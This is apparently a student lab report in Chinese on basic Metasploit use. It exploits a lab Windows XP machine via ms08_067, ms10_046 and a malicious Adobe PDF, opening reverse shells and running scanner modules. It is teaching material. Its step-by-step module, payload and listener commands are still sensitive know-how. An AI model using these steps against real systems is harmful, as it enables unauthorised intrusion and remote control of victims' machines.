1. 程式人生 > >Exp5 MSF基礎應用 20154302 薛師凡

Exp5 MSF基礎應用 20154302 薛師凡

運用 局限性 功能 rev 自動 option 計算機 short 解釋

Exp5 MSF基礎應用

20154302 薛師凡

一、基礎問題回答

(1)用自己的話解釋什麽是 exploit , payload , encode.

exploit:

是破除門鎖的工具以及運送間諜的載具,相當於利用漏洞偷偷打開的管道,將做好的木馬病毒等順利傳輸到靶機。

payload:

就是被運送的間諜,到了房子裏頭就可以執行各種間諜活動。簡單來說就是病毒代碼包裝成一個可執行的文件,或者包裝成指定的類型,然後通過管道傳輸進去後開始為我們控制靶機服務。

encode:

是間諜穿的偽裝的衣服,便於間諜潛入目標針對payload進行編碼,就是對它進行包裝打扮,改變payload代碼特征,但是不改變payload為我們所用的特征,但能對payload進行加工。

二、實踐過程

本次試驗共分為四個部分:

  • 1.一個主動攻擊實踐,ms08_067

  • 2.一個針對瀏覽器的攻擊,ms10_046漏洞攻擊

  • 3.一個針對客戶端的攻擊,adobe_toolbutton

  • 4.成功應用任何一個輔助模塊scanner/postscan/tcp
    和gather blowser_info

實驗環境:

攻擊機:kali:192.168.238.131
靶機:Windows:192.168.238.130

2.1主動攻擊:ms08_067

先百度一下ms08_067漏洞的意思
技術分享圖片

參考學長的報告得知英文版XP才可以進行漏洞攻擊
1.首先查看兩個主機的IP地址

2.先msfconsole,再kali主機鍵入search ms08_067 查看漏洞信息
鍵輸入use exploit/windows/smb/ms08_067_netapi,
技術分享圖片

3.然後鍵入show payloads查看需要的payload
技術分享圖片

此處首先從眾地輸入了set payload generic/shell_reverse_tcp選擇病毒模塊

show options查看需要的信息,進行相應設置
技術分享圖片

4.鍵入show targets查看適用的靶機版本,可以set target 0自動選擇
技術分享圖片
技術分享圖片

5.設置好以後輸入exploit進行攻擊。
技術分享圖片

連接不上靶機,攻擊失敗
然後各種失敗
技術分享圖片

然後又互相ping一下,發現WinXP可以ping通kali,但是kali卻ping不通WinXP,
,果斷關閉防火墻,現在可以ping通了。
技術分享圖片

技術分享圖片

再進行攻擊,還是失敗,於是無奈之下選擇了更換病毒模塊。
技術分享圖片

終於成功了!
技術分享圖片
技術分享圖片

2. 對瀏覽器攻擊:ms10_046漏洞攻擊

基本步驟還是和上面一樣,先利用search ms10_046指令查看可以運用的攻擊模塊:
技術分享圖片

用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用該模塊,再使用show payloads查看可以供我們使用的payload:
技術分享圖片

然後查看需要設置的參數,SRVHOST填的是本地監聽主機的IP地址,LHOST也是監聽的IP地址,所以這裏SRVHOST和LHOST都應該填攻擊機的IP地址:

set LHOST 192.168.238.131
set SRVHOST 192.168.238.131

使用exploit指令執行漏洞,可以看到生成了一個url,在靶機的IE瀏覽器上使用該url進行訪問,
技術分享圖片

技術分享圖片

又失敗了幾次,
技術分享圖片

技術分享圖片
換了病毒模塊
技術分享圖片

在MSF終端看見漏洞執行成功:

使用sessions指令查看當前存在的會話,可以看到存在一個ID為1的會話:

使用sessions -i 1選擇會話1,成功獲取了靶機的shell,利用systeminfo指令查看靶機的系統信息:
技術分享圖片

3. 對Adobe的漏洞攻擊:adobe_toolbutton

先使用search adobe查詢和adobe漏洞有關的模塊,我選擇的是use exploit/windows/fileformat/adobe_toolbutton,然後使用該模塊,設置回連的payload:
技術分享圖片
技術分享圖片

技術分享圖片

set LHOST 192.168.238.131
set LPORT 4302
set FILENAME 20154302.pdf
設置:
技術分享圖片

設置好相應參數後,開始實施攻擊,發現在/root/.msf4/local/目錄下成功生成了一個lxm.pdf文件:
技術分享圖片

use exploit/multi/handler
set payload generic/shell_reverse_tcp windows/meterpreter/reverse_tcp

然後將該文件傳送到靶機上,並且在攻擊機上打開監聽:
技術分享圖片

將靶機中的pdf文件打開,攻擊機成功獲取到靶機shell:
技術分享圖片

4、輔助模塊應用

輔助模塊真的好多啊

這裏我用了scanner/postscan/tcp模塊
查看其設置的參數
技術分享圖片

設置好之後,掃描
好像是失敗了
技術分享圖片
更改了設置,好像也沒有用
技術分享圖片

我之後換了gather blowser_info,這是一個通過過網站訪問來搜集計算機信息的輔助
技術分享圖片

info查看要設置的參數,設置好,這次成功了,可以看到系統的信息
技術分享圖片

三、實驗體會

本次實驗讓我又一次認識了MSF,功能真的強大,
這次實驗我們的攻擊對象只是XP系統的虛擬機,比較有局限性,隨著網絡攻擊技術的進步,我們更應該學會漏洞的掃描和分析,以及及時的去打好補丁。本次實驗從第一個開始就十分不順利,屢次失敗,通過調試網絡和更換病毒模塊最終取得成功,總體來說還是收獲頗豐,而且還磨練了自己的耐心。

Exp5 MSF基礎應用 20154302 薛師凡